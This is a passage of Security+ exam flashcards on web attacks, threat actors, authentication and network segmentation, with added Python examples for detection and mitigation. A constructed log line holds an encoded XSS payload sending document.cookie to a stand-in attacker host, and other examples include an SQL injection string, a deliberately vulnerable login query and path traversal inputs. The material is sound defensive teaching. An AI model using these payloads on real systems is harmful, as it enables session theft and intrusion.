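    ("bob",   "2024-05-01T12:00:00", "Boston",   42.3601, -71.0589, "s4"),
    ("carol", "2024-05-01T10:00:00", "Chicago",  41.8781, -87.6298, "s5"),
    ("carol", "2024-05-01T10:05:00", "Chicago",  41.8781, -87.6298, "s6"),
]

# Assumed policy threshold: commercial air travel is under 1000 km/h, so a
# faster implied speed cannot be the same person carrying the credential.
MAX_SPEED_KMH = 1000.0
EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two points given in decimal degrees."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def _by_user(events):
    """Group events per user, ordered by timestamp."""
    grouped = {}
    for user, ts, city, lat, lon, sid in sorted(events, key=lambda e: (e[0], e[1])):
        grouped.setdefault(user, []).append((datetime.fromisoformat(ts), city, lat, lon, sid))
    return grouped


def impossible_travel(events, max_speed_kmh=MAX_SPEED_KMH):
    """Return (user, from_city, to_city, implied_speed_kmh) for each pair of
    consecutive logins that would require travelling faster than the threshold."""
    findings = []
    for user, evs in _by_user(events).items():
        for (t1, c1, la1, lo1, _), (t2, c2, la2, lo2, _) in zip(evs, evs[1:]):
            dist = haversine_km(la1, lo1, la2, lo2)
            hours = max((t2 - t1).total_seconds() / 3600.0, 1e-9)  # guard against identical timestamps
            speed = dist / hours
            if speed > max_speed_kmh:
                findings.append((user, c1, c2, round(speed)))
    return findings


def concurrent_sessions(events, session_ttl=timedelta(hours=1), single_session_users=()):
    """Return (user, earlier_session, later_session) when a user who is expected to
    hold one session at a time opens a second distinct session while the first is
    still within its assumed lifetime. Ordinary users (the Gmail-on-several-devices
    case in the card) are not listed in single_session_users and so are ignored."""
    findings = []
    grouped = _by_user(events)
    for user in single_session_users:
        evs = grouped.get(user, [])
        for (t1, _, _, _, s1), (t2, _, _, _, s2) in zip(evs, evs[1:]):
            if s1 != s2 and t2 - t1 < session_ttl:
                findings.append((user, s1, s2))
    return findings


if __name__ == "__main__":
    print("impossible travel:", impossible_travel(LOGINS))
    print("concurrent sessions:", concurrent_sessions(LOGINS, single_session_users=("carol",)))
```

Alice's New York to Tokyo hop (roughly 10,850 km in 20 seconds) is flagged; Bob's New York to Boston trip over four hours is not. Carol is flagged only because she is named in the single-session policy list; without that list the same two logins would be treated as normal, which is the distinction the card draws.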

80
Q

You are your organization’s security analyst. Recently, you discovered that an attacker injected malicious code into a web application on your organization’s website. You discovered this attack by reviewing the log data on the web servers. Which type of attack did your organization experience?

A) path traversal
B) SQL injection
C) cross-site scripting
D) buffer overflow

A

Your organization experienced a cross-site scripting (XSS) attack. An XSS attack occurs when an attacker locates a vulnerability on a website that allows the attacker to inject malicious script into a web application. A persistent (stored) XSS attack occurs when data provided to the web application is first stored on the server and later displayed to users without being HTML-encoded. A non-persistent (reflected) XSS attack occurs when data provided by a web client is used immediately by server-side code to generate the response for that user. XSS flaws arise whenever an application takes user-supplied data and sends it to a browser without first validating or encoding it.

To locate XSS attacks, you should look for lines in the web server log that contain JavaScript or other scripting languages that forward a user’s session cookie to an external location or web page.
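An added example (not part of the flashcards) of the log review the answer describes: a small scanner that parses web-server combined-format access log lines, URL-decodes each request, and flags the XSS indicators a reviewer would look for, including the session-cookie exfiltration pattern. The log lines, hosts, and indicator patterns are constructed for illustration and are a starting point rather than a complete signature set.

```python
"""Scan web-server access-log lines for reflected-XSS indicators.

Added example, not from the flashcards. The combined-format log lines
below are constructed; the hostnames in them are documentation addresses.
"""
import re
from urllib.parse import unquote_plus

# Constructed Apache/Nginx "combined" log lines. Line 2 reflects a script that
# sends document.cookie to an attacker host; line 3 uses an event handler.
ACCESS_LOG = """\
203.0.113.5 - - [01/May/2024:10:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/May/2024:10:00:07 +0000] "GET /search?q=%3Cscript%3Enew+Image%28%29.src%3D%27http%3A%2F%2Fevil.example%2Fc%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 734 "-" "curl/8.0"
203.0.113.9 - - [01/May/2024:10:00:09 +0000] "GET /profile?name=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1" 200 201 "-" "curl/8.0"
198.51.100.2 - - [01/May/2024:10:01:15 +0000] "GET /about HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request path, status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators checked against the URL-decoded request path and query string.
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script", re.I),
    "event_handler": re.compile(r"\bon\w+\s*=", re.I),
    "cookie_theft": re.compile(r"document\.cookie", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
}


def decode_path(path: str, rounds: int = 3) -> str:
    """Decode repeatedly (bounded) so double-encoded payloads are also caught."""
    for _ in range(rounds):
        decoded = unquote_plus(path)
        if decoded == path:
            break
        path = decoded
    return path


def scan_line(line: str):
    """Return a finding dict for a line carrying XSS indicators, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None  # not a combined-format request line
    decoded = decode_path(m.group("path"))
    matched = sorted(name for name, rx in XSS_PATTERNS.items() if rx.search(decoded))
    if not matched:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": decoded, "indicators": matched}


def scan_log(text: str) -> list:
    """Scan every line of an access log and collect the findings."""
    return [finding for finding in map(scan_line, text.splitlines()) if finding]


if __name__ == "__main__":
    for finding in scan_log(ACCESS_LOG):
        print(finding["ts"], finding["ip"], finding["indicators"], finding["path"])
```

Decoding before matching matters: the raw log line for the cookie-stealing request contains no literal `<script>` or `document.cookie`, only their percent-encoded forms, so a grep over the raw text would miss it. The patterns only see the request line; POST bodies are not in the access log, so stored XSS through form submissions has to be found in application logs or the data itself.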

81
Q

What are signs of a buffer overflow?

A

A buffer overflow occurs when more data is written to a buffer than it was allocated to hold, so the excess overwrites adjacent memory. Typical signs are unexplained application crashes (segmentation faults or access violations), corrupted data, and code executing that the program never contained.

82
Q

What does input validation mitigate?

A

A SQL injection occurs when an attacker inputs actual database commands into the database input fields instead of the valid input. You should include input validation to prevent SQL injection attacks.
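An added example (not part of the flashcards) that shows the injection the SQL injection and input validation cards describe, beside the fix. Both login functions run against an in-memory SQLite database with two constructed user rows; the `' OR '1'='1` payload turns the string-built query into one that matches every row, while the parameterized version treats the same text as plain data. The allow-list username check is included as the validation layer the card asks for, with the caveat that it complements parameterization rather than replacing it.

```python
"""SQL injection: a string-built query beside its parameterized fix.

Added example, not from the flashcards. The users table and its two rows are
constructed test data in an in-memory SQLite database.
"""
import re
import sqlite3

USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def make_db() -> sqlite3.Connection:
    """Create the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """Builds the statement by concatenation, so attacker text becomes SQL syntax.
    Deliberately vulnerable; kept to show the failure, never use this pattern."""
    sql = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username: str, password: str) -> list:
    """Parameterized query: values travel separately from the statement text,
    so quotes and keywords in the input are data, never syntax."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def is_valid_username(username: str) -> bool:
    """Allow-list validation: letters, digits, underscore, 1 to 32 characters.
    This is defense in depth; parameterization is what actually stops injection."""
    return USERNAME_RE.fullmatch(username) is not None


def demo() -> dict:
    """Run the payload through both code paths and a legitimate login through the safe one."""
    conn = make_db()
    payload = "' OR '1'='1"
    return {
        "vulnerable": login_vulnerable(conn, "anything", payload),
        "safe": login_safe(conn, "anything", payload),
        "legit": login_safe(conn, "bob", "hunter2"),
        "payload_passes_validation": is_valid_username(payload),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable query expands to `... WHERE username = 'anything' AND password = '' OR '1'='1'`; because `AND` binds tighter than `OR`, the trailing `OR '1'='1'` is true for every row and the attacker is "authenticated" as all users at once. Note also that the table stores plaintext passwords purely to keep the example short; a real system stores salted password hashes.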

83
Q

What does entering ../ in a URL do?

A

Path traversal occurs when the ../ characters are entered into the URL to traverse directories that are not supposed to be available from the web.
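An added example (not part of the flashcards) of the check a web application should apply before mapping a URL path onto the filesystem, together with a detector for the `../` sequences the card describes. The document root `/var/www/html` is an assumed value; the code only manipulates path strings and never reads the disk, so it runs anywhere. It also handles the encoded forms (`%2e%2e%2f`, and the double-encoded `%252e%252e%252f`) that a plain search for `../` would miss.

```python
"""Reject path traversal when mapping a URL path onto a document root.

Added example, not from the flashcards. WEB_ROOT is an assumed directory;
nothing here touches the filesystem.
"""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root


def decode_fully(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded traversal is normalized."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def looks_like_traversal(url_path: str) -> bool:
    """True if any path segment is '..' after decoding; useful for log review."""
    decoded = decode_fully(url_path).replace("\\", "/")
    return ".." in decoded.split("/")


def resolve_under_root(url_path: str, root: str = WEB_ROOT):
    """Return the absolute path a request maps to, or None if it would leave root."""
    decoded = decode_fully(url_path)
    if "\x00" in decoded:
        return None  # NUL bytes truncate paths in C-based file APIs; reject outright
    decoded = decoded.replace("\\", "/")  # treat backslash as a separator too
    rel = decoded.lstrip("/")  # a leading "/" would make join() discard the root
    # Join first, then normalize: "../" segments are collapsed against the root,
    # and the prefix check catches anything that still escapes it.
    candidate = posixpath.normpath(posixpath.join(root, rel))
    root = root.rstrip("/")
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for p in ["images/logo.png", "../../etc/passwd", "%2e%2e%2fetc/passwd",
              "%252e%252e%252fetc/passwd", "docs/../index.html"]:
        print(f"{p!r:32} -> {resolve_under_root(p)}")
```

The prefix check uses `root + "/"` rather than `root` alone so that a sibling directory such as `/var/www/html2` is not mistaken for a location inside the root. The safer design overall is to avoid mapping user-supplied paths onto the filesystem at all and to serve files by an identifier looked up in an allow list.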

84
Q

What are some of the possible countermeasures to input validation attacks?

A

Some possible countermeasures to input validation attacks include the following:

Filter out all known malicious requests.
Validate all information coming from the client, both at the client level and at the server level.
Implement a security policy that includes parameter checking in all web applications.

85
Q

What is click jacking?

A

Another application issue that you need to understand is clickjacking. Clickjacking is a technique that tricks users into clicking on something other than what they perceive, typically by overlaying an invisible or disguised frame on a legitimate page, so that the click reveals confidential information or hands the attacker control of the user's computer.

86
Q

How can you determine attack vectors?

A

Often you will need to determine the attack vector used. Reverse engineering the malware or exploit involved is the best way to do this.

87
Q

What are the considerations when designing a web application?

A

When designing a web application, security should be one of the facets that you should always keep in mind. An application should be secure by design, by default, and by deployment. Secure by design means that the application is designed with security in mind. Secure by default means that the application defaults to being secure without changing application settings. Secure by deployment means that the environment into which the application is deployed is taken into consideration from a security standpoint.

88
Q

What are the exploits that will cause security issues with identity and access management?

A

You also need to understand exploits that will cause security issues with identity and access management:

Impersonation – Attackers may try to impersonate a legitimate user to obtain access credentials. Identity proofing is mitigation for this type of attack.

On-path (formerly man-in-the-middle, MITM) – This attack occurs when an attacker intercepts messages between two devices and eavesdrops on the communication. The attacker attempts to impersonate each party to the other. Using one-time passwords and mutual authentication are mitigations for this attack.

Session hijack – This attack occurs when an attacker attempts to take over a session that is already occurring. Encryption is a mitigation for this attack.

Rootkit – A rootkit is a set of software tools that allow an attacker to gain and keep privileged control of a device while hiding its presence. Because a rootkit undermines the system's ability to report on itself, the best mitigation is to rebuild the affected system from trusted media rather than attempt an in-place removal.

89
Q

What is vishing?

A) an attack that looks for open ports

B) a special type of phishing that targets a single power user

C) a special type of phishing that appears to come from a trusted individual

D) a special type of phishing that uses Voice over IP (VoIP)

A

Vishing is a special type of phishing that uses VoIP. Often these types of attacks involve receiving telephone calls that appear to come from a trusted source, such as your financial institution. The telephone call asks you to disclose confidential information that can be used to access your account.

An Xmas (Christmas tree) scan is a port scan that sends TCP packets with the FIN, PSH, and URG flags set to look for open ports. Nmap is the most popular tool used to carry out this type of scan.

Spear phishing is a special type of phishing that appears to come from a trusted individual. Digital Signatures can help protect against spear phishing attacks, and improve the overall security posture, by assuring employees that an email originated from the CEO.

Whaling is a special type of phishing that targets a single power user, such as a Chief Executive Officer (CEO). Whaling is used to gain confidential information about the company, and usually occurs via email.

90
Q

Which of the following is most likely the primary motivation for a threat actor who wants to gain notoriety by claiming responsibility for an event?

A) Disruption and chaos
B) War
C) Revenge
D) Service disruption

A

Some threat actors simply want to cause disruption and chaos. A threat actor might be motivated by this technique to gain notoriety by claiming responsibility for the event. Whatever the event, their goal is to upset normal operations in an attention-getting way.

91
Q

What is service disruption?

A

Service disruption is meant to damage an organization's reputation or cause loss of public confidence in the organization. If an airline suffered a disruption that prevented customers from accessing its services, such as booking a flight, those customers would likely do business with another airline. Service disruption may have any underlying motivation, including revenge or financial gain. Its purpose is to harm a specific organization, whereas attackers motivated by disruption and chaos will choose any random, vulnerable target.

92
Q

What are ethical hackers?

A

Ethical hackers want to prevent an event, not cause one and take credit for it. Ethical hackers (sometimes called white-hat hackers or penetration testers) are individuals hired by the company to test the company’s security infrastructure. Their purpose is to conduct activities to find weaknesses and “break in”. The ethical hacker will prepare a report detailing the weaknesses so that the client company can address those issues and make corrections.

93
Q

How does war influence cybersecurity attacks?

A

Militaries and civilians can be motivated by war. Civilians and nation-states can use cyberspace to advance wartime agendas. Each may be engaged in activities that disrupt a target’s communications, services, and infrastructure, or to spread propaganda, misinformation, and fear. Nation-states want cyber-attacks that advance wartime agendas to remain secret so that the target states are unaware of their actions.

94
Q
A

Espionage – Competition attacks are the modern version of industrial espionage. Theft of intellectual property, marketing plans, and customer lists are all examples that can have devastating effects on the targeted organization. Even stealing the victim company’s credit card list can have a severe economic impact on that company. Often, the attacking company will find a disgruntled individual in the subject company to carry out the attack.

Blackmail – Blackmail is the threat to release sensitive PII or incriminating evidence regarding an individual who has access to certain company assets, such as data, systems, or processes. The cyber-criminal threatens to expose the individual unless they take some action against a company asset on the criminal’s behalf.

Data exfiltration – Data exfiltration is the act of sending sensitive or proprietary information to unauthorized recipients external to the organization. Data loss prevention is designed to detect and stop data exfiltration behavior by users. If DLP software is not present, data exfiltration might only be discovered after the event. When it occurs, the best course of action is to identify the source of the disclosure, if possible, and then take disciplinary action.

Philosophical or political beliefs – Philosophical beliefs and political beliefs are used by extremist groups to recruit members to their cause. One nation might attempt to convince citizens of another nation to perform cyberterrorist activities. Hacktivists are the typical actor here.

Revenge – threat actors can be motivated by revenge. Revenge and retaliation result from the perception that the threat actor has been slighted by a person or organization. The threat actor wants to “teach them a lesson” or extract revenge.

95
Q

Which of the following would most likely be the primary motivation for attacks conducted by organized crime?

A) Revenge
B) Financial gain
C) Disruption and chaos
D) Wartime agendas

A

Organized crime most commonly conducts cyber-attacks for their personal financial gain. This is exemplified by activities such as fraud, ransom attacks, and theft of credit card data. Once the threat actor has your information, they can sell it or use it for fraudulent purposes.

96
Q

An attacker carried out an IP spoofing that included saturating your network with ICMP messages. Which attack occurred?

A) brute force
B) on-path
C) smurf
D) SYN flood

A

A smurf attack is a combination of Internet Protocol (IP) spoofing and the saturation of a network with Internet Control Message Protocol (ICMP) messages. To initiate a smurf attack, a hacker sends ICMP echo requests from a computer outside a network, spoofed with the IP address of a computer inside the network, to the network's broadcast address. Every host on the network replies to the spoofed address, so the victim is flooded with ICMP replies. A smurf attack causes a denial-of-service (DoS) on a network because computers are busy responding to, and receiving, the ICMP messages. The IP spoofing part of a smurf attack can be countered by configuring a router to ensure that messages with IP addresses inside the network originate on the private network side of the router; the amplification part is countered by not forwarding directed broadcasts, which is the default on current routers.

97
Q

When does a SYN flood attack occur?

A

A SYN flood attack occurs when an attacker exploits the three-way Transmission Control Protocol (TCP) handshake: the attacker sends a large number of SYN segments, often from spoofed source addresses, and never completes the handshake, so the target's table of half-open connections fills up and legitimate connection attempts are refused. A SYN flood attack is a type of denial-of-service (DoS) attack.

98
Q

You have recently been notified by an application vendor that the application includes a rootkit. The manufacturer has released a patch that will remove the vulnerability from the application. What is a rootkit?

A) a software application that displays advertisements while the application is executing

B) an application that uses tracking cookies to collect and report a user’s activities

C) a program that spreads itself through network connections

D) a collection of programs that grants a hacker administrative access to a computer or network

A

A rootkit is a collection of programs that grants a hacker administrative access to a computer or network. The hacker first gains access to a single system, and then uploads the rootkit to the hacked system. An example of a rootkit is a system-level kernel module that modifies file system operations. If a server dedicated to the storage and processing of sensitive information is compromised with a rootkit and sensitive data was exfiltrated, you should wipe the storage, reinstall the OS from original media, and restore the data from the last known good backup.

99
Q

You are responsible for designing your company’s identification, authentication, and authorization system to ensure that the company’s network is protected from unauthorized access. What is the purpose of authentication on this network?

A) backing up data stored on hard disks
B) verifying the identity of users
C) allowing users to access resources
D) encrypting files

A

Authentication refers to the process of verifying the identity of users. Authentication technologies that you need to understand include the following:

Tokens – a small device that generates time-sensitive passwords

Common access cards (CAC) – similar to smart cards and used by the U.S. Department of Defense for military personnel, civilian employees, and contractors

Smart cards – small plastic cards that contains authentication information

Multifactor authentication – when multiple authentication factors are used to authenticate a user.

100
Q

Name all the authentication factors?

A

For the Security+ exam, you must understand the following authentication factors: something you are, something you have, and something you know. You also need to understand two additional authentication attributes: somewhere you are and something you do.

101
Q

Authentication: What is TOTP?

A

TOTP – A time-based one-time password is an extension of HOTP in which the moving factor is the current time, divided into fixed steps, rather than a counter. If an organization introduces token-based authentication for system administrators because of the risk of password compromise, and the tokens display a set of numbers that automatically change every 30 seconds, TOTP is being used.

102
Q

Authentication: What is HOTP?

A

HOTP – An HMAC-based one-time password (RFC 4226) is an algorithm that generates a password that is used once. Each code is derived by computing an HMAC over a shared secret and a counter that both the token and the server increment with each use, then truncating the result to a short decimal number. Because each code is valid for only one authentication attempt, a captured code cannot be replayed, and without the secret the next code cannot be predicted.

103
Q

Authentication: What is CHAP?

A

CHAP – Challenge Handshake Authentication Protocol is an authentication protocol that validates the identity of a remote user with a challenge-response exchange: the server sends a random challenge, the client returns a hash of the challenge combined with the shared secret, and the secret itself is never sent over the link.

104
Q

Authentication: What is PAP?

A

PAP – Password Authentication Protocol is an authentication protocol that sends the username and password across the link in cleartext, so anyone able to sniff the link captures the credentials. CHAP was designed to replace it.
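The PAP and CHAP exchanges from the two cards above, simulated as an added example (not code from the original flashcards) so the two can be compared from the viewpoint of someone sniffing the link. The user name, secret and challenge values are constructed; the CHAP response is computed exactly as RFC 1994 specifies (MD5 over identifier, secret and challenge).

```python
# Added example (not from the original flashcards): a simulated PAP exchange
# and a simulated CHAP exchange (RFC 1994, MD5) between a client and an
# access server, so the two can be compared from the viewpoint of someone
# sniffing the link. The user and secret are constructed.
import hashlib
import hmac
import os
from typing import List, Tuple

STORED_SECRETS = {"george": "correct-horse-battery"}  # what the server holds; constructed


def pap_exchange(username: str, password: str) -> Tuple[List[str], bool]:
    """PAP: the client sends the password itself, in the clear."""
    wire = [f"client->server  Authenticate-Request name={username} password={password}"]
    ok = STORED_SECRETS.get(username) == password
    wire.append("server->client  " + ("Authenticate-Ack" if ok else "Authenticate-Nak"))
    return wire, ok


def chap_hash(identifier: int, secret: str, challenge: bytes) -> bytes:
    """RFC 1994 response value: MD5(identifier || secret || challenge)."""
    return hashlib.md5(bytes([identifier]) + secret.encode() + challenge).digest()


def chap_verify(username: str, identifier: int, challenge: bytes, response: bytes) -> bool:
    """Server side: recompute from the stored secret and compare in constant time."""
    expected = chap_hash(identifier, STORED_SECRETS.get(username, ""), challenge)
    return hmac.compare_digest(expected, response)


def chap_exchange(username: str, client_secret: str, challenge: bytes = None,
                  identifier: int = 1) -> Tuple[List[str], bool, bytes]:
    """CHAP: the server issues a fresh random challenge, the client proves it
    knows the secret by hashing it with the challenge; the secret never goes
    on the wire."""
    challenge = challenge if challenge is not None else os.urandom(16)
    wire = [f"server->client  Challenge id={identifier} value={challenge.hex()}"]
    response = chap_hash(identifier, client_secret, challenge)
    wire.append(f"client->server  Response id={identifier} name={username} value={response.hex()}")
    ok = chap_verify(username, identifier, challenge, response)
    wire.append("server->client  " + ("Success" if ok else "Failure"))
    return wire, ok, response


def secret_visible(wire: List[str], secret: str) -> bool:
    """What a sniffer learns: is the secret itself present in any frame?"""
    return any(secret in frame for frame in wire)


if __name__ == "__main__":
    for frame in pap_exchange("george", "correct-horse-battery")[0]:
        print(frame)
    for frame in chap_exchange("george", "correct-horse-battery")[0]:
        print(frame)
```

Two caveats the simulation makes visible: a captured CHAP response is useless against a different challenge, so replay protection depends entirely on the server never reusing a challenge; and because the response is an unkeyed MD5 over the secret, an attacker who captures one challenge/response pair can still run an offline dictionary attack against a weak secret, which is why the server must also store the secret in a form it can use directly rather than as a slow password hash.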

105
Q

Authentication: What is single-Sign-On?

A

Single sign-on – an authentication technology that allows a user to log in once and be granted access to different systems configured as part of the network

106
Q

Authorization: What is implicit deny?

A

Implicit deny – the default rule that anything not explicitly permitted is denied. For example, a packet that matches none of the entries in a firewall ACL is dropped, and a user who has been granted no permission on a file has no access to it, even though no rule names them. (A deny that a user inherits from a group or role membership is an explicit deny, not an implicit one.)

107
Q

What is Authorization?

A

Authorization allows users to access resources. Authorization is typically applied to a user account after a user is authenticated on a network.

108
Q

Authentication: What is a Trusted OS?

A

Trusted OS – an operating system that provides support for multilevel security

109
Q

Authorization: Least privilege?

A

Least privilege – This principle ensures that users are granted only those permissions they need to do their work

110
Q

Authorization: Separation of Duties?

A

Separation of duties – This principle ensures that tasks are divided between users to ensure that one user cannot commit fraud.

111
Q

Authorization: ACL?

A

Access Control List (ACL) – An ordered list of rules that controls permissions to resources, or which traffic a network device passes. Rules are evaluated top to bottom, the first match wins, and anything that matches no rule falls through to the implicit deny at the end of the list.
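A first-match ACL evaluator with an implicit deny, as an added example (not code from the original flashcards) that ties the ACL, implicit deny and least privilege cards together. The rule set and the packets are constructed: it models a least-privilege ACL for an R&D segment that lists only the two flows the department needs and lets everything else fall through.

```python
# Added example (not from the original flashcards): a first-match packet
# ACL evaluator with the implicit deny that real router and firewall ACLs
# apply to anything no rule permits. Rules and packets are constructed.
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Rule:
    action: str            # "permit" or "deny"
    proto: str             # "tcp", "udp" or "any"
    src: str               # CIDR, e.g. "10.1.1.0/24"
    dst: str
    dport: Optional[int]   # None matches any destination port


@dataclass
class Packet:
    proto: str
    src: str
    dst: str
    dport: int


def matches(rule: Rule, pkt: Packet) -> bool:
    return (
        rule.proto in ("any", pkt.proto)
        and ipaddress.ip_address(pkt.src) in ipaddress.ip_network(rule.src)
        and ipaddress.ip_address(pkt.dst) in ipaddress.ip_network(rule.dst)
        and rule.dport in (None, pkt.dport)
    )


def evaluate(acl: List[Rule], pkt: Packet) -> Tuple[str, str]:
    """First matching rule wins. If nothing matches, the packet is denied
    even though no rule says so: that is the implicit deny."""
    for i, rule in enumerate(acl):
        if matches(rule, pkt):
            return rule.action, f"explicit rule {i}"
    return "deny", "implicit deny"


# Least-privilege ACL for the R&D segment: only the two flows the
# department needs are listed; everything else falls through.
RND_ACL = [
    Rule("permit", "tcp", "10.1.1.0/24", "10.2.0.10/32", 443),   # R&D -> build server, HTTPS
    Rule("permit", "udp", "10.1.1.0/24", "10.2.0.53/32", 53),    # R&D -> DNS
]

if __name__ == "__main__":
    for pkt in (
        Packet("tcp", "10.1.1.5", "10.2.0.10", 443),   # permitted by rule 0
        Packet("tcp", "10.1.1.5", "10.2.0.10", 22),    # SSH: no rule -> implicit deny
        Packet("tcp", "10.3.3.3", "10.2.0.10", 443),   # wrong source subnet -> implicit deny
    ):
        print(pkt, "->", evaluate(RND_ACL, pkt))
```

Because the first match wins, rule order matters: a broad permit placed above a narrower deny silently neutralises the deny, which is the most common ACL misconfiguration found in audits.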

112
Q

Authorization: Time of day restrictions?

A

Time of day restrictions – This method configures the time(s) and day(s) that users are allowed to access resources. In some cases, this policy also allows administrators to configure the location from which the user can log in.

113
Q

What is the AAA standard in CyberSecurity?

A

Authentication, authorization, and accounting (AAA) is a term for controlling access to computer resources using authentication, enforcing policies using authorization, and auditing usage and providing the information necessary to bill for services using accounting.

114
Q

Which of these vulnerabilities is often associated with cloud computing?

A) Legacy applications
B) Resource reuse
C) Outdated firmware
D) End-of-life hardware

A

Resource reuse vulnerability is often associated with cloud computing. In cloud computing, a resource such as memory, a file or an application may be used by multiple customers. When the customer is finished with the item they are using, such as memory, the cloud provider should sanitize it by writing all zeroes to the memory. Doing so ensures that when the next customer uses the memory, that memory does not have any trace data from the previous customer. Failure to sanitize the memory during the transition from one customer to another introduces the possibility of a resource reuse vulnerability.

115
Q

Which message-based attack vector is estimated to be responsible for launching over 90% of all attacks?

A) IM
B) Typo-squatting
C) SMS
D) Email

A

Email is estimated to be responsible for more than 90% of all attacks. All it takes is one unsuspecting user to open the wrong attachment, or click on a bogus link, to compromise the organization. There are several varieties of email attacks, such as phishing, spear phishing, whaling, and others. Spear phishing targets a specific individual, while whaling targets a high-level person (typically C-level) in the organization.

Some methods of preventing email attacks include blocking messages from senders with bad domain reputations, throttling or blocking messages from known bad IP addresses, using email authentication (SPF, DKIM and DMARC) to verify that senders are authorized to use the domain they claim, and bulk filtering of user mailboxes.

116
Q

What is Typo Squatting?

A

Typo-squatting, also known as URL hijacking, relies on mistakes made by users when they input web addresses. Another type of URL hijacking involves replacing the source behind a link in a search engine index and redirecting to a false URL.

117
Q

Which type of attack relies on mistakes made by users when they input Web addresses?

A) malicious insider threat
B) URL hijacking
C) DoS
D) watering hole attack

A

A URL hijacking, or typo-squatting, attack relies on mistakes made by users when they input Web addresses. Another type of URL hijacking involves replacing the source behind a link in a search engine index and redirecting to a false URL.

118
Q

What is a watering hole attack?

A

A watering hole attack occurs when an attacker profiles victims to discover the sites they visit. The attacker then accesses the most commonly accessed sites for vulnerabilities. Once a vulnerability is discovered, the attacker then compromises the site and redirects users to an alternative site that will infect the computers of users who access this alternative site. This attack may also be called a waterhole attack.

119
Q

You need to implement an independent network within your private LAN. Only users in the Research and Development department should be able to access the independent network. Which type of network should you deploy?

A) an extranet
B) a VLAN
C) a VPN
D) a DMZ

A

You should deploy a virtual local area network (VLAN). This type of network can be used to ensure that internal access to other parts of the network is controlled and restricted. A VLAN is usually created using a switch. VLAN segregation protects each individual segment by isolating the segments. Because ARP only travels within a broadcast domain, VLAN segmentation also contains ARP poisoning to the VLAN in which it starts. VLANs provide a layer of protection against sniffers and can decrease broadcast traffic. Creating a VLAN is much simpler than using firewalls or implementing a virtual private network (VPN). A VLAN is a good solution if you need to separate two departments into separate networks. VLAN management is implemented at the switch, which is where the VLANs and the ports or nodes allowed to participate in each VLAN are configured. You can also configure a switch to allow only traffic from computers based upon their physical (MAC) address, though MAC addresses are easily spoofed, so this is not a strong control on its own.

120
Q

What are other zone topologies that you need to understand?

A

Intranet – a network connection within an organization that is designed for business-to-employee communication.

Wireless – a network connection that allows personnel and guests to connect without using wires.

Guest – a network that is set aside for guest usage, usually isolated from the internal network and given limited connection capabilities.

Honeynet – a set of honeypots that appear to be attractive targets but are actually traps for attackers.

Network address translation (NAT) – a technology that allows resources that are using private IP addresses to communicate with the Internet through the NAT device and using a single public IP address.

Ad hoc – a network that consists of a group of devices communicating wirelessly without a wireless access point.

121
Q

What do you also need to understand the following segregation/segmentation/isolation topics:

A

Physical – a type of segmentation whereby different segments of the network are separated by physical devices, such as routers and firewalls.

Logical (VLAN) – a type of segmentation whereby different segments of the network are virtually separated using a switch.

Virtualization – a type of isolation whereby multiple guest machines reside on a single physical computer.

Air gaps – an isolation technique whereby a computer is not connected to any network to prevent security issues, or an IoT device is prevented from connecting to external networks.

122
Q

Which threat actor type would most likely have the most resources available?

A) Unskilled attackers
B) Organized crime
C) Nation states
D) Hacktivist

A

Nation-state / Advanced Persistent Threat (APT) attacks would most likely have the most resources available. These attacks are conducted by one nation upon another, or upon a significant entity within the target country, with large sophisticated attacks. APTs have attackers who have very significant amounts of time and funding resources. Motives could be financial, political, disruption of the economy, or theft of intellectual property, such as military secrets. They are a highly skilled group of attackers that keep their presence hidden so that they can continually exploit their targets and launch layered attacks, known as establishing a foothold.

123
Q

What are script kiddies?

A

Unskilled attackers (sometimes referred to as script kiddies) typically rely on tools that are widely available on the Internet. They are often motivated by the thrill of the chase and by the need to prove that they can do it. For the most part, they have limited time and financial resources.

124
Q

What are some ways to detect threat attributes and the main threat actors that you should know?

A

One way to identify threat actor attributes is to use open-source intelligence (OSINT). There are several websites and tools available to assist you. One is ThreatCrowd (www.threatcrowd.org), which allows you to examine several types of attacks.

Another website is https://openphish.com, which gives you the most current information on phishing attacks. To summarize the attributes of the various threat actors that you should know for the SY0-701 exam:

Internal or external – Attackers can come from within a target organization, making the threat actor internal. Nation-states, by contrast, would be external threat actors.

